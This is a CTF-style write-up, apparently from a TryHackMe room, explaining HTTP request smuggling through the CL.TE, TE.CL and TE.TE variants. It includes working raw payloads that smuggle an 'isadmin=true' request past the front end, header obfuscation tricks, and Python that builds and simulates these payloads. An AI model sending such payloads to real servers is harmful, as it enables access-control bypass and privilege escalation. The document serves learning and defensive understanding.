DEV Community
Sean Lee


TryHackMe: HTTP Request Smuggling

Headers Involved

Two headers decide where a request body ends:

  • Content-Length states the length of the body in bytes (not characters), example:

```http
POST /update HTTP/1.1
Host: example.com
Content-Length: 13
Content-Type: application/x-www-form-urlencoded

isadmin=true
```

  • Transfer-Encoding: chunked sends the body as a series of chunks, each prefixed by its size in hexadecimal and terminated by a zero-length chunk (the 0 line), example:

```http
POST /search HTTP/1.1
Host: example.com
Transfer-Encoding: chunked

e
q=smuggledData
0

```

Transfer-Encoding usually has the value chunked; other values include compress, deflate and gzip.

HTTP request smuggling arises when the front-end and back-end servers use different rules to decide where a request ends. If a request carries both Content-Length and Transfer-Encoding, each server may honour a different one, so the two servers split the same bytes into requests differently: what the front end treats as the tail of one request's body, the back end may treat as the start of a new request.


CL.TE Example

CL.TE means Content-Length/Transfer-Encoding: the front end uses Content-Length and the back end uses Transfer-Encoding.

```http
POST /search HTTP/1.1
Host: example.com
Content-Length: 130
Transfer-Encoding: chunked

0

POST /update HTTP/1.1
Host: example.com
Content-Length: 13
Content-Type: application/x-www-form-urlencoded

isadmin=true
```

HTTP smuggling is essentially hiding one request inside another.

Here the front-end server honours Content-Length: 130, so it treats everything up to and including isadmin=true as the body of the POST /search request and forwards it all. The back-end server honours Transfer-Encoding: chunked instead: the 0 is a zero-length chunk, which terminates the body, so the first request ends there and the bytes that follow (POST /update ...) are left on the connection and parsed as a separate, new request. The smuggled POST /update with isadmin=true is therefore processed by the back end even though the front end never saw it as a request, which is how controls enforced at the front end get bypassed.

Be mindful of an incorrect Content-Length. If its value is 25 but the body is actually 30 bytes, the server processes only the first 25 bytes and treats the remaining 5 as the beginning of the next request; if the value is larger than the body, the server waits for the missing bytes (or takes them from the next request on the connection). Note that isadmin=true is 12 bytes, so the Content-Length: 13 used in the examples above only lines up if a trailing newline is sent with it.


TE.CL Example

TE.CL means Transfer-Encoding/Content-Length: the front end uses Transfer-Encoding and the back end uses Content-Length.

```http
POST / HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

78
POST /update HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

isadmin=true
0

```

In the above payload, the front-end server honours Transfer-Encoding: chunked. The 78 (hexadecimal for 120) declares a 120-byte chunk, so the front end reads the smuggled POST /update request as chunk data and treats everything up to the terminating 0 chunk as the body of the first request, forwarding it all as one request. The chunk size has to match the byte count of the smuggled request exactly, line endings included, so count them when building the payload.

The back-end server, however, honours Content-Length: 4, so it reads only the first 4 bytes of the body (the 78 line and its line break) as the first request. The rest, starting at POST /update, is then parsed as a separate, new request. The smuggled request's own Content-Length: 15 is sized to also absorb the trailing 0 line, so the chunk terminator is swallowed by the smuggled request instead of being left behind as junk for the back end to parse.


TE.TE Example

TE.TE means Transfer-Encoding/Transfer-Encoding, AKA Transfer-Encoding obfuscation. Both the front end and the back end support Transfer-Encoding, so the attacker obfuscates the header until one of the two servers fails to recognise it and falls back to Content-Length.

The TE.TE vulnerability doesn't always require multiple Transfer-Encoding headers. Instead, it often involves a single, malformed Transfer-Encoding header that is interpreted differently by the front-end and back-end servers.

Aim: make one server ignore the TE header and use CL instead.

```http
POST / HTTP/1.1
Host: example.com
Content-length: 4
Transfer-Encoding: chunked
Transfer-Encoding: chunked1

4e
POST /update HTTP/1.1
Host: example.com
Content-length: 15

isadmin=true
0

```

In the above payload, the front-end server encounters two Transfer-Encoding headers. The first one is the standard chunked encoding, but the second one, chunked1, is non-standard. Depending on its configuration, the front-end server might process the request based on the first Transfer-Encoding: chunked header and ignore the malformed chunked1, interpreting the entire request up to the 0 as a single chunked message.

The back-end server, however, might handle the malformed Transfer-Encoding: chunked1 differently. It could either reject the malformed part and process the request the same way as the front end, or treat the Transfer-Encoding header as unrecognised and frame the body by Content-length: 4 instead. In that case it reads only the first 4 bytes, and the remainder starting at POST /update is treated as a separate, new request. Variations on the same idea (a bogus value such as xchunked, a space before the colon, unusual casing, or a folded header line) are tried one at a time until one server stops honouring the header while the other still does.
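To make the three desyncs above concrete, here is an added example (not code from the TryHackMe room or the original post): a small HTTP/1.1 request splitter whose framing rule is a parameter, so the same bytes can be parsed once "as the front end" and once "as the back end". The policy names (cl_first, te_lenient, te_strict) and the two server behaviours they model are my simplification of how real servers disagree; example.com is a placeholder and every payload is constructed in the block. It builds the CL.TE, TE.CL and TE.TE payloads with their sizes computed (they come out to the same 130, 4 and 15 as in the examples above when CRLF line endings are used), shows how many requests each side sees, and also shows what happens when Content-Length overstates the body, as in the caveat on incorrect Content-Length.

```python
# Added example (not code from the TryHackMe room or the original post): a small HTTP/1.1
# request splitter whose framing rule is a parameter, so the same bytes can be parsed "as the
# front end" and "as the back end". example.com is a placeholder; all payloads are constructed here.
from typing import Dict, List, Optional, Tuple

def _find_head_end(data: bytes) -> Optional[Tuple[int, int]]:
    # (offset, width) of the blank line ending the header block; accepts CRLF or bare LF
    hits = [(i, 4) for i in [data.find(b"\r\n\r\n")] if i != -1]
    hits += [(i, 2) for i in [data.find(b"\n\n")] if i != -1]
    return min(hits) if hits else None

def _parse_head(head: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    lines = [l.rstrip("\r") for l in head.decode("latin-1").split("\n")]
    pairs = [l.partition(":") for l in lines[1:]]
    return lines[0], [(n.strip().lower(), v.strip()) for n, _, v in pairs]

def _decode_chunked(data: bytes) -> Tuple[bytes, int]:
    """Decode a chunked body at data[0:] -> (payload, bytes consumed); ValueError if truncated."""
    out, pos = bytearray(), 0
    while True:
        eol = data.index(b"\n", pos)                        # end of the hex chunk-size line
        size = int(data[pos:eol].strip().split(b";")[0], 16)
        pos = eol + 1
        if size == 0:                                       # zero-length chunk terminates the body
            pos += 2 if data.startswith(b"\r\n", pos) else 1 if data.startswith(b"\n", pos) else 0
            return bytes(out), pos
        if len(data) - pos < size:
            raise ValueError("chunk truncated")
        out += data[pos:pos + size]
        pos = data.index(b"\n", pos + size) + 1             # skip the line break after the data

def _uses_chunked(headers: List[Tuple[str, str]], policy: str) -> bool:
    """Does a server with this framing policy read the body as chunked (True) or by Content-Length?"""
    te = [v.lower() for n, v in headers if n == "transfer-encoding"]
    if not te:
        return False
    if policy == "cl_first":     # Content-Length wins whenever it is present
        return not any(n == "content-length" for n, _ in headers)
    if policy == "te_lenient":   # any TE value containing "chunked" is honoured ("chunked1" too)
        return any("chunked" in v for v in te)
    if policy == "te_strict":    # TE only if every value is exactly "chunked"; otherwise fall back
        return all(v == "chunked" for v in te)   # to Content-Length (RFC 7230 says reject instead)
    raise ValueError(f"unknown policy {policy}")

def split_requests(data: bytes, policy: str) -> List[Dict[str, object]]:
    """The requests a server using `policy` carves out of one byte stream."""
    seen: List[Dict[str, object]] = []
    while data.lstrip(b"\r\n"):
        data = data.lstrip(b"\r\n")  # RFC 7230 3.5: blank lines before a request-line are ignored
        found = _find_head_end(data)
        if found is None:
            seen.append({"line": "<incomplete headers>", "headers": [], "body": data})
            break
        line, headers = _parse_head(data[:found[0]])
        rest = data[found[0] + found[1]:]
        if _uses_chunked(headers, policy):
            try:
                body, used = _decode_chunked(rest)
            except ValueError:
                seen.append({"line": line, "headers": headers, "body": rest, "missing": "chunk end"})
                break
        else:
            length = next((int(v) for n, v in headers if n == "content-length"), 0)
            if len(rest) < length:  # server blocks here, or takes the shortfall from the next request
                seen.append({"line": line, "headers": headers, "body": rest, "missing": length - len(rest)})
                break
            body, used = rest[:length], length
        seen.append({"line": line, "headers": headers, "body": body})
        data = rest[used:]
    return seen

def build_request(line: bytes, headers: List[bytes], body: bytes) -> bytes:
    return line + b"\r\n" + b"".join(h + b"\r\n" for h in headers) + b"\r\n" + body

HOST, FORM = b"Host: example.com", b"Content-Type: application/x-www-form-urlencoded"

def smuggled_update(content_length: int) -> bytes:
    # the request being smuggled (POST /update, isadmin=true) with whatever Content-Length the caller wants
    return build_request(b"POST /update HTTP/1.1", [HOST, FORM, b"Content-Length: %d" % content_length], b"isadmin=true")

def clte_payload() -> bytes:
    # front end (CL) swallows everything; back end (TE) stops at the 0 chunk and sees POST /update next
    body = b"0\r\n\r\n" + smuggled_update(len(b"isadmin=true"))
    return build_request(b"POST /search HTTP/1.1",
                         [HOST, b"Content-Length: %d" % len(body), b"Transfer-Encoding: chunked"], body)

def tecl_payload(*te_headers: bytes) -> bytes:
    # front end (TE) reads one chunk holding the whole smuggled request; back end (CL) reads only the
    # 4-byte size line. The inner Content-Length (15) also swallows the trailing "\r\n0" terminator.
    inner = smuggled_update(len(b"isadmin=true\r\n0"))
    size_line = b"%x\r\n" % len(inner)
    return build_request(b"POST / HTTP/1.1", [HOST, b"Content-Length: %d" % len(size_line), *te_headers],
                         size_line + inner + b"\r\n0\r\n\r\n")

CHUNKED, MALFORMED = b"Transfer-Encoding: chunked", b"Transfer-Encoding: chunked1"
SCENARIOS = {"CL.TE": (clte_payload(), "cl_first", "te_lenient"),
             "TE.CL": (tecl_payload(CHUNKED), "te_lenient", "cl_first"),
             "TE.TE": (tecl_payload(CHUNKED, MALFORMED), "te_lenient", "te_strict")}

def desync_summary() -> Dict[str, Tuple[List[str], List[str]]]:
    # per scenario: the request lines the front end sees vs. the request lines the back end sees
    return {name: ([r["line"] for r in split_requests(p, front)], [r["line"] for r in split_requests(p, back)])
            for name, (p, front, back) in SCENARIOS.items()}
```

In every scenario the front-end policy yields a single request while the back-end policy yields two, the second being POST /update with isadmin=true; that difference in request count is the desync. Running split_requests(smuggled_update(13), "cl_first") shows the other failure mode: with 13 declared but 12 bytes present, the parser reports one byte missing, which on a real connection means the server waits, or steals that byte from whatever request arrives next.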
